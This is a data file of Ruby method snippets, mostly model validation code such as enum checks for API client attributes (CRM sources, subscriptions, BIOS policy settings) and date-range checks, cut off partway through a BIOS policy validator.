"def valid?\n return false if @name.nil?\n return false if @value.nil?\n return false if @timestamp.nil?\n return false if @source_id.nil?\n return false if @source_label.nil?\n return false if @source.nil?\n source_validator = EnumAttributeValidator.new('String', [\"IMPORT\", \"API\", \"FORM\", \"ANALYTICS\", \"MIGRATION\", \"SALESFORCE\", \"INTEGRATION\", \"CONTACTS_WEB\", \"WAL_INCREMENTAL\", \"TASK\", \"EMAIL\", \"WORKFLOWS\", \"CALCULATED\", \"SOCIAL\", \"BATCH_UPDATE\", \"SIGNALS\", \"BIDEN\", \"DEFAULT\", \"COMPANIES\", \"DEALS\", \"ASSISTS\", \"PRESENTATIONS\", \"TALLY\", \"SIDEKICK\", \"CRM_UI\", \"MERGE_CONTACTS\", \"PORTAL_USER_ASSOCIATOR\", \"INTEGRATIONS_PLATFORM\", \"BCC_TO_CRM\", \"FORWARD_TO_CRM\", \"ENGAGEMENTS\", \"SALES\", \"HEISENBERG\", \"LEADIN\", \"GMAIL_INTEGRATION\", \"ACADEMY\", \"SALES_MESSAGES\", \"AVATARS_SERVICE\", \"MERGE_COMPANIES\", \"SEQUENCES\", \"COMPANY_FAMILIES\", \"MOBILE_IOS\", \"MOBILE_ANDROID\", \"CONTACTS\", \"ASSOCIATIONS\", \"EXTENSION\", \"SUCCESS\", \"BOT\", \"INTEGRATIONS_SYNC\", \"AUTOMATION_PLATFORM\", \"CONVERSATIONS\", \"EMAIL_INTEGRATION\", \"CONTENT_MEMBERSHIP\", \"QUOTES\", \"BET_ASSIGNMENT\", \"QUOTAS\", \"BET_CRM_CONNECTOR\", \"MEETINGS\", \"MERGE_OBJECTS\", \"RECYCLING_BIN\", \"ADS\", \"AI_GROUP\", \"COMMUNICATOR\", \"SETTINGS\", \"PROPERTY_SETTINGS\", \"PIPELINE_SETTINGS\", \"COMPANY_INSIGHTS\", \"BEHAVIORAL_EVENTS\", \"PAYMENTS\", \"GOALS\", \"PORTAL_OBJECT_SYNC\", \"APPROVALS\", \"FILE_MANAGER\", \"MARKETPLACE\", \"INTERNAL_PROCESSING\", \"FORECASTING\", \"SLACK_INTEGRATION\", \"CRM_UI_BULK_ACTION\", \"WORKFLOW_CONTACT_DELETE_ACTION\"])\n return false unless source_validator.valid?(@source)\n return false if @selected_by_user.nil?\n return false if @selected_by_user_timestamp.nil?\n return false if @source_vid.nil?\n return false if @source_metadata.nil?\n return false if @request_id.nil?\n true\n end",
"def validate\n carrier_fk = carrier_id if carrier_fk.nil?\n if id.nil?\n date_array = FeeSchedule.find(:all,:conditions=>[\"carrier_id =? and practice_id = ? \",carrier_fk,practice_id]).collect{|x|[x.start_date,x.end_date]} if carrier_fk != 0\n else\n date_array = FeeSchedule.find(:all,:conditions=>[\"carrier_id =? and practice_id = ? and id != ? \",carrier_fk,practice_id,id]).collect{|x|[x.start_date,x.end_date]} if carrier_fk != 0\n end\n start_error = \"\"\n if !date_array.nil?\n for start_d,end_d in date_array\n unless start_date.nil?\n if start_date.to_date >= start_d.to_date and start_date.to_date <= end_d.to_date\n start_error =\"error\"\n end\n end \n unless end_date.nil?\n if end_date.to_date >= start_d.to_date and end_date.to_date <= end_d.to_date\n start_error =\"error\"\n end\n end \n end\n end\n errors.add(\"Selected Date Range already Exists for the Carrier. selected date range for the carrier\") unless start_error.empty?\n unless start_date.nil?\n unless end_date.nil?\n errors.add(\"End date should be greater than start date, End Date \") unless end_date.to_date > start_date.to_date\n end\n end\n if charge_type == 'Standard'\n if id.nil?\n dat_array_charge_type = FeeSchedule.find(:all,:conditions=>[\"charge_type =? and practice_id = ? \",\"Standard\",practice_id]).collect{|x|[x.start_date,x.end_date]}\n else\n dat_array_charge_type = FeeSchedule.find(:all,:conditions=>[\"charge_type =? and practice_id = ? and id != ?\",\"Standard\",practice_id,id]).collect{|x|[x.start_date,x.end_date]}\n end\n start_error_charge_type = \"\"\n for start_d_charge_type,end_d_charge_type in dat_array_charge_type\n unless start_date.nil?\n if start_date.to_date >= start_d_charge_type.to_date and start_date.to_date <= end_d_charge_type.to_date\n start_error_charge_type =\"error\"\n end\n end\n unless end_date.nil?\n if end_date.to_date >= start_d_charge_type.to_date and end_date.to_date <= end_d_charge_type.to_date\n start_error_charge_type =\"error\"\n end\n end \n end \n errors.add(\"Selected Date Range already Exists for the Practice. selected Date range for the Practice\") unless start_error_charge_type.empty? \n end\n end",
"def valid_points_record_attributes?(attibutes)\n attibutes[:course_user_id].present? &&\n attibutes[:points_awarded].present? &&\n attibutes[:points_awarded].to_i >= 1\n end",
"def blank_date_parameter?\n (1..3).any? { |position| values[position].blank? }\n end",
"def add_on_minimal_charge? invoice_period_end\n minimal_charge_enabled? and minimal_charge_start_at and minimal_charge_start_at < invoice_period_end #Time.parse('2001-01-01 00:00:00') < invoice_period_end#Date.parse(minimal_charge_start_at) < invoice_period_end\n end",
"def valid?\n @errors = []\n @errors << 'you must give a new walltime' if walltime.blank?\n @errors << 'new walltime must be a String' if !walltime.blank? && !walltime.is_a?(String)\n @errors << 'timeout must be an Integer' if !timeout.blank? && !timeout.is_a?(Integer)\n\n # We support Booleans for YES_NO_ATTRIBUTES and also Strings with 'yes/no',\n # however only Booleans is documented.\n # OAR's Rest API needs 'yes/no' Strings, we transform the Booleans to\n # 'yes/no' Strings.\n YES_NO_ATTRIBUTES.each do |attribute|\n value = instance_variable_get \"@#{attribute}\"\n if !value.nil?\n if !([TrueClass, FalseClass].include?(value.class) ||\n (value.is_a?(String) && ['yes', 'no'].include?(value)))\n @errors << \"#{YES_NO_ATTRIBUTES.join(', ')} must be a Boolean\"\n break\n else\n case value\n when TrueClass\n instance_variable_set \"@#{attribute}\", 'yes'\n when FalseClass\n instance_variable_set \"@#{attribute}\", 'no'\n else\n end\n end\n end\n end\n\n @errors.empty?\n end",
"def checkAttributeRequirements\n if @valid_attributes.empty?\n @error_text = \"No valid attributes found\"\n return false\n elsif (@mandatory_attributes_from_db & @valid_attributes) != @mandatory_attributes_from_db\n missing_attr = @mandatory_attributes_from_db - (@mandatory_attributes_from_db & @valid_attributes)\n\n x_attr_txt = \"\"\n missing_attr.each {|x_attr| x_attr_txt += x_attr[:name] + \", \"}\n @error_text = \"Mandatory attributes #{x_attr_txt[0..-3]} is/are missing\"\n return false\n end\n\n return true\n end",
"def model_attributes\n return if model_date.blank?\n\n DATE_PARTS.each_with_object({}) { |part, hash| hash[parts_hash[part]] = model_date.__send__(part) }\n end",
"def validates_dates\n ( Date.parse(self['birth_date']) rescue errors.add(:birth_date, 'invalid.date') ) if !self['birth_date'].blank?\n ( Date.parse(self['ffck_number_date']) rescue errors.add(:ffck_number_date, 'invalid.date') ) if !self['ffck_number_date'].blank?\n ( Date.parse(self['medical_certificate_date']) rescue errors.add(:medical_certificate_date, 'invalid.date') ) if !self['medical_certificate_date'].blank?\n ( Date.parse(self['tetanus_vaccine_date']) rescue errors.add(:tetanus_vaccine_date, 'invalid.date') ) if !self['tetanus_vaccine_date'].blank?\n end",
"def valid?\n return false if @id.nil?\n return false if @account_id.nil?\n return false if @organization_id.nil?\n return false if @product_id.nil?\n return false if @product_rate_plan_id.nil?\n return false if @name.nil?\n type_validator = EnumAttributeValidator.new('String', [\"Subscription\", \"FixedTerm\", \"Trial\"])\n return false unless type_validator.valid?(@type)\n return false if @state.nil?\n state_validator = EnumAttributeValidator.new('String', [\"Trial\", \"Provisioned\", \"Paid\", \"AwaitingPayment\", \"Cancelled\", \"Failed\", \"Expired\"])\n return false unless state_validator.valid?(@state)\n return false if @initial_period_start.nil?\n return false if @trial_end.nil?\n managed_by_validator = EnumAttributeValidator.new('String', [\"BillForward\", \"Stripe\"])\n return false unless managed_by_validator.valid?(@managed_by)\n return false if @version_start.nil?\n return false if @version_number.nil?\n return false if @current_time.nil?\n failed_payment_behaviour_validator = EnumAttributeValidator.new('String', [\"CancelSubscription\", \"None\"])\n return false unless failed_payment_behaviour_validator.valid?(@failed_payment_behaviour)\n return true\n end",
"def valid?\n return false if @class_id.nil?\n class_id_validator = EnumAttributeValidator.new('String', [\"bios.Policy\"])\n return false unless class_id_validator.valid?(@class_id)\n return false if @object_type.nil?\n object_type_validator = EnumAttributeValidator.new('String', [\"bios.Policy\"])\n return false unless object_type_validator.valid?(@object_type)\n acs_control_gpu1state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu1state_validator.valid?(@acs_control_gpu1state)\n acs_control_gpu2state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu2state_validator.valid?(@acs_control_gpu2state)\n acs_control_gpu3state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu3state_validator.valid?(@acs_control_gpu3state)\n acs_control_gpu4state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu4state_validator.valid?(@acs_control_gpu4state)\n acs_control_gpu5state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu5state_validator.valid?(@acs_control_gpu5state)\n acs_control_gpu6state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu6state_validator.valid?(@acs_control_gpu6state)\n acs_control_gpu7state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu7state_validator.valid?(@acs_control_gpu7state)\n acs_control_gpu8state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_gpu8state_validator.valid?(@acs_control_gpu8state)\n acs_control_slot11state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_slot11state_validator.valid?(@acs_control_slot11state)\n acs_control_slot12state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_slot12state_validator.valid?(@acs_control_slot12state)\n acs_control_slot13state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_slot13state_validator.valid?(@acs_control_slot13state)\n acs_control_slot14state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless acs_control_slot14state_validator.valid?(@acs_control_slot14state)\n adjacent_cache_line_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless adjacent_cache_line_prefetch_validator.valid?(@adjacent_cache_line_prefetch)\n advanced_mem_test_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless advanced_mem_test_validator.valid?(@advanced_mem_test)\n all_usb_devices_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless all_usb_devices_validator.valid?(@all_usb_devices)\n altitude_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"300-m\", \"900-m\", \"1500-m\", \"3000-m\", \"auto\"])\n return false unless altitude_validator.valid?(@altitude)\n aspm_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\", \"Force L0s\", \"L1 Only\"])\n return false unless aspm_support_validator.valid?(@aspm_support)\n assert_nmi_on_perr_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless assert_nmi_on_perr_validator.valid?(@assert_nmi_on_perr)\n assert_nmi_on_serr_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless assert_nmi_on_serr_validator.valid?(@assert_nmi_on_serr)\n auto_cc_state_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless auto_cc_state_validator.valid?(@auto_cc_state)\n autonumous_cstate_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless autonumous_cstate_enable_validator.valid?(@autonumous_cstate_enable)\n baud_rate_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"9600\", \"19200\", \"38400\", \"57600\", \"115200\"])\n return false unless baud_rate_validator.valid?(@baud_rate)\n bme_dma_mitigation_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless bme_dma_mitigation_validator.valid?(@bme_dma_mitigation)\n boot_option_num_retry_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"5\", \"13\", \"Infinite\"])\n return false unless boot_option_num_retry_validator.valid?(@boot_option_num_retry)\n boot_option_re_cool_down_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"15\", \"45\", \"90\"])\n return false unless boot_option_re_cool_down_validator.valid?(@boot_option_re_cool_down)\n boot_option_retry_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless boot_option_retry_validator.valid?(@boot_option_retry)\n boot_performance_mode_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Max Efficient\", \"Max Performance\", \"Set by Intel NM\"])\n return false unless boot_performance_mode_validator.valid?(@boot_performance_mode)\n burst_and_postponed_refresh_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless burst_and_postponed_refresh_validator.valid?(@burst_and_postponed_refresh)\n c1auto_demotion_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless c1auto_demotion_validator.valid?(@c1auto_demotion)\n c1auto_un_demotion_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless c1auto_un_demotion_validator.valid?(@c1auto_un_demotion)\n cbs_cmn_apbdis_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"0\", \"1\", \"Auto\"])\n return false unless cbs_cmn_apbdis_validator.valid?(@cbs_cmn_apbdis)\n cbs_cmn_cpu_cpb_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\"])\n return false unless cbs_cmn_cpu_cpb_validator.valid?(@cbs_cmn_cpu_cpb)\n cbs_cmn_cpu_gen_downcore_ctrl_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"FOUR (2 + 2)\", \"FOUR (4 + 0)\", \"SIX (3 + 3)\", \"THREE (3 + 0)\", \"TWO (1 + 1)\", \"TWO (2 + 0)\"])\n return false unless cbs_cmn_cpu_gen_downcore_ctrl_validator.valid?(@cbs_cmn_cpu_gen_downcore_ctrl)\n cbs_cmn_cpu_global_cstate_ctrl_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_cpu_global_cstate_ctrl_validator.valid?(@cbs_cmn_cpu_global_cstate_ctrl)\n cbs_cmn_cpu_l1stream_hw_prefetcher_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_cpu_l1stream_hw_prefetcher_validator.valid?(@cbs_cmn_cpu_l1stream_hw_prefetcher)\n cbs_cmn_cpu_l2stream_hw_prefetcher_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_cpu_l2stream_hw_prefetcher_validator.valid?(@cbs_cmn_cpu_l2stream_hw_prefetcher)\n cbs_cmn_cpu_smee_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_cpu_smee_validator.valid?(@cbs_cmn_cpu_smee)\n cbs_cmn_cpu_streaming_stores_ctrl_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_cpu_streaming_stores_ctrl_validator.valid?(@cbs_cmn_cpu_streaming_stores_ctrl)\n cbs_cmn_determinism_slider_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Performance\", \"Power\"])\n return false unless cbs_cmn_determinism_slider_validator.valid?(@cbs_cmn_determinism_slider)\n cbs_cmn_efficiency_mode_en_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Enabled\"])\n return false unless cbs_cmn_efficiency_mode_en_validator.valid?(@cbs_cmn_efficiency_mode_en)\n cbs_cmn_fixed_soc_pstate_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"P0\", \"P1\", \"P2\", \"P3\"])\n return false unless cbs_cmn_fixed_soc_pstate_validator.valid?(@cbs_cmn_fixed_soc_pstate)\n cbs_cmn_gnb_nb_iommu_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_gnb_nb_iommu_validator.valid?(@cbs_cmn_gnb_nb_iommu)\n cbs_cmn_gnb_smu_df_cstates_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_gnb_smu_df_cstates_validator.valid?(@cbs_cmn_gnb_smu_df_cstates)\n cbs_cmn_gnb_smucppc_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_gnb_smucppc_validator.valid?(@cbs_cmn_gnb_smucppc)\n cbs_cmn_mem_ctrl_bank_group_swap_ddr4_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cmn_mem_ctrl_bank_group_swap_ddr4_validator.valid?(@cbs_cmn_mem_ctrl_bank_group_swap_ddr4)\n cbs_cmn_mem_map_bank_interleave_ddr4_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\"])\n return false unless cbs_cmn_mem_map_bank_interleave_ddr4_validator.valid?(@cbs_cmn_mem_map_bank_interleave_ddr4)\n cbs_cmnc_tdp_ctl_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Manual\"])\n return false unless cbs_cmnc_tdp_ctl_validator.valid?(@cbs_cmnc_tdp_ctl)\n cbs_cpu_ccd_ctrl_ssp_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"2 CCDs\", \"3 CCDs\", \"4 CCDs\", \"6 CCDs\", \"Auto\"])\n return false unless cbs_cpu_ccd_ctrl_ssp_validator.valid?(@cbs_cpu_ccd_ctrl_ssp)\n cbs_cpu_core_ctrl_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"FIVE (5 + 0)\", \"FOUR (4 + 0)\", \"ONE (1 + 0)\", \"SEVEN (7 + 0)\", \"SIX (6 + 0)\", \"THREE (3 + 0)\", \"TWO (2 + 0)\"])\n return false unless cbs_cpu_core_ctrl_validator.valid?(@cbs_cpu_core_ctrl)\n cbs_cpu_smt_ctrl_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_cpu_smt_ctrl_validator.valid?(@cbs_cpu_smt_ctrl)\n cbs_dbg_cpu_snp_mem_cover_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Custom\", \"disabled\", \"enabled\"])\n return false unless cbs_dbg_cpu_snp_mem_cover_validator.valid?(@cbs_dbg_cpu_snp_mem_cover)\n return false if !@cbs_dbg_cpu_snp_mem_size_cover.nil? && @cbs_dbg_cpu_snp_mem_size_cover !~ Regexp.new(/^(\\d|[1-9]\\d|[1-9]\\d{2}|[1-9]\\d{3}|[1-9]\\d{4}|[1-9]\\d{5}|10[0-3]\\d{4}|104[0-7]\\d{3}|1048[0-4]\\d{2}|10485[0-6]\\d|104857[0-6])$|^(platform-default)$/)\n cbs_df_cmn_acpi_srat_l3numa_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless cbs_df_cmn_acpi_srat_l3numa_validator.valid?(@cbs_df_cmn_acpi_srat_l3numa)\n cbs_df_cmn_dram_nps_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"NPS0\", \"NPS1\", \"NPS2\", \"NPS4\"])\n return false unless cbs_df_cmn_dram_nps_validator.valid?(@cbs_df_cmn_dram_nps)\n cbs_df_cmn_mem_intlv_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Channel\", \"Die\", \"None\", \"Socket\"])\n return false unless cbs_df_cmn_mem_intlv_validator.valid?(@cbs_df_cmn_mem_intlv)\n cbs_df_cmn_mem_intlv_size_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"256 Bytes\", \"512 Bytes\", \"1 KB\", \"2 KB\", \"4 KB\", \"Auto\"])\n return false unless cbs_df_cmn_mem_intlv_size_validator.valid?(@cbs_df_cmn_mem_intlv_size)\n cbs_sev_snp_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless cbs_sev_snp_support_validator.valid?(@cbs_sev_snp_support)\n cdn_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless cdn_enable_validator.valid?(@cdn_enable)\n cdn_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"LOMs Only\"])\n return false unless cdn_support_validator.valid?(@cdn_support)\n channel_inter_leave_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1-way\", \"2-way\", \"3-way\", \"4-way\", \"auto\"])\n return false unless channel_inter_leave_validator.valid?(@channel_inter_leave)\n cisco_adaptive_mem_training_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless cisco_adaptive_mem_training_validator.valid?(@cisco_adaptive_mem_training)\n cisco_debug_level_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Maximum\", \"Minimum\", \"Normal\"])\n return false unless cisco_debug_level_validator.valid?(@cisco_debug_level)\n cisco_oprom_launch_optimization_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless cisco_oprom_launch_optimization_validator.valid?(@cisco_oprom_launch_optimization)\n cisco_xgmi_max_speed_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless cisco_xgmi_max_speed_validator.valid?(@cisco_xgmi_max_speed)\n cke_low_policy_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"auto\", \"disabled\", \"fast\", \"slow\"])\n return false unless cke_low_policy_validator.valid?(@cke_low_policy)\n closed_loop_therm_throtl_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless closed_loop_therm_throtl_validator.valid?(@closed_loop_therm_throtl)\n cmci_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless cmci_enable_validator.valid?(@cmci_enable)\n config_tdp_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless config_tdp_validator.valid?(@config_tdp)\n config_tdp_level_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Level 1\", \"Level 2\", \"Normal\"])\n return false unless config_tdp_level_validator.valid?(@config_tdp_level)\n console_redirection_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"com-0\", \"com-1\", \"disabled\", \"enabled\", \"serial-port-a\"])\n return false unless console_redirection_validator.valid?(@console_redirection)\n core_multi_processing_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"11\", \"12\", \"13\", \"14\", \"15\", \"16\", \"17\", \"18\", \"19\", \"20\", \"21\", \"22\", \"23\", \"24\", \"25\", \"26\", \"27\", \"28\", \"29\", \"30\", \"31\", \"32\", \"33\", \"34\", \"35\", \"36\", \"37\", \"38\", \"39\", \"40\", \"41\", \"42\", \"43\", \"44\", \"45\", \"46\", \"47\", \"48\", \"all\"])\n return false unless core_multi_processing_validator.valid?(@core_multi_processing)\n cpu_energy_performance_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"balanced-energy\", \"balanced-performance\", \"balanced-power\", \"energy-efficient\", \"performance\", \"power\"])\n return false unless cpu_energy_performance_validator.valid?(@cpu_energy_performance)\n cpu_frequency_floor_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless cpu_frequency_floor_validator.valid?(@cpu_frequency_floor)\n cpu_perf_enhancement_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Disabled\"])\n return false unless cpu_perf_enhancement_validator.valid?(@cpu_perf_enhancement)\n cpu_performance_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"custom\", \"enterprise\", \"high-throughput\", \"hpc\"])\n return false unless cpu_performance_validator.valid?(@cpu_performance)\n cpu_power_management_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"custom\", \"disabled\", \"energy-efficient\", \"performance\"])\n return false unless cpu_power_management_validator.valid?(@cpu_power_management)\n cr_qos_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Disabled\", \"Mode 0 - Disable the PMem QoS Feature\", \"Mode 1 - M2M QoS Enable and CHA QoS Disable\", \"Mode 2 - M2M QoS Enable and CHA QoS Enable\", \"Recipe 1\", \"Recipe 2\", \"Recipe 3\"])\n return false unless cr_qos_validator.valid?(@cr_qos)\n crfastgo_config_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Default\", \"Disable optimization\", \"Enable optimization\", \"Option 1\", \"Option 2\", \"Option 3\", \"Option 4\", \"Option 5\"])\n return false unless crfastgo_config_validator.valid?(@crfastgo_config)\n dcpmm_firmware_downgrade_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless dcpmm_firmware_downgrade_validator.valid?(@dcpmm_firmware_downgrade)\n demand_scrub_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless demand_scrub_validator.valid?(@demand_scrub)\n direct_cache_access_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"auto\", \"disabled\", \"enabled\"])\n return false unless direct_cache_access_validator.valid?(@direct_cache_access)\n dram_clock_throttling_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"Balanced\", \"Energy Efficient\", \"Performance\"])\n return false unless dram_clock_throttling_validator.valid?(@dram_clock_throttling)\n dram_refresh_rate_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"1x\", \"2x\", \"3x\", \"4x\", \"Auto\"])\n return false unless dram_refresh_rate_validator.valid?(@dram_refresh_rate)\n dram_sw_thermal_throttling_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless dram_sw_thermal_throttling_validator.valid?(@dram_sw_thermal_throttling)\n eadr_support_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Auto\", \"disabled\", \"enabled\"])\n return false unless eadr_support_validator.valid?(@eadr_support)\n edpc_en_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Disabled\", \"On Fatal Error\", \"On Fatal and Non-Fatal Errors\"])\n return false unless edpc_en_validator.valid?(@edpc_en)\n enable_clock_spread_spec_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless enable_clock_spread_spec_validator.valid?(@enable_clock_spread_spec)\n enable_mktme_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless enable_mktme_validator.valid?(@enable_mktme)\n enable_sgx_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless enable_sgx_validator.valid?(@enable_sgx)\n enable_tme_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless enable_tme_validator.valid?(@enable_tme)\n energy_efficient_turbo_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless energy_efficient_turbo_validator.valid?(@energy_efficient_turbo)\n eng_perf_tuning_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"BIOS\", \"OS\"])\n return false unless eng_perf_tuning_validator.valid?(@eng_perf_tuning)\n enhanced_intel_speed_step_tech_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless enhanced_intel_speed_step_tech_validator.valid?(@enhanced_intel_speed_step_tech)\n epoch_update_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Change to New Random Owner EPOCHs\", \"Manual User Defined Owner EPOCHs\", \"SGX Owner EPOCH activated\"])\n return false unless epoch_update_validator.valid?(@epoch_update)\n epp_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless epp_enable_validator.valid?(@epp_enable)\n epp_profile_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Balanced Performance\", \"Balanced Power\", \"Performance\", \"Power\"])\n return false unless epp_profile_validator.valid?(@epp_profile)\n execute_disable_bit_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless execute_disable_bit_validator.valid?(@execute_disable_bit)\n extended_apic_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"disabled\", \"enabled\", \"X2APIC\", \"XAPIC\"])\n return false unless extended_apic_validator.valid?(@extended_apic)\n flow_control_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"none\", \"rts-cts\"])\n return false unless flow_control_validator.valid?(@flow_control)\n frb2enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless frb2enable_validator.valid?(@frb2enable)\n hardware_prefetch_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"enabled\", \"disabled\"])\n return false unless hardware_prefetch_validator.valid?(@hardware_prefetch)\n hwpm_enable_validator = EnumAttributeValidator.new('String', [\"platform-default\", \"Disabled\", \"HWPM Native Mode\", 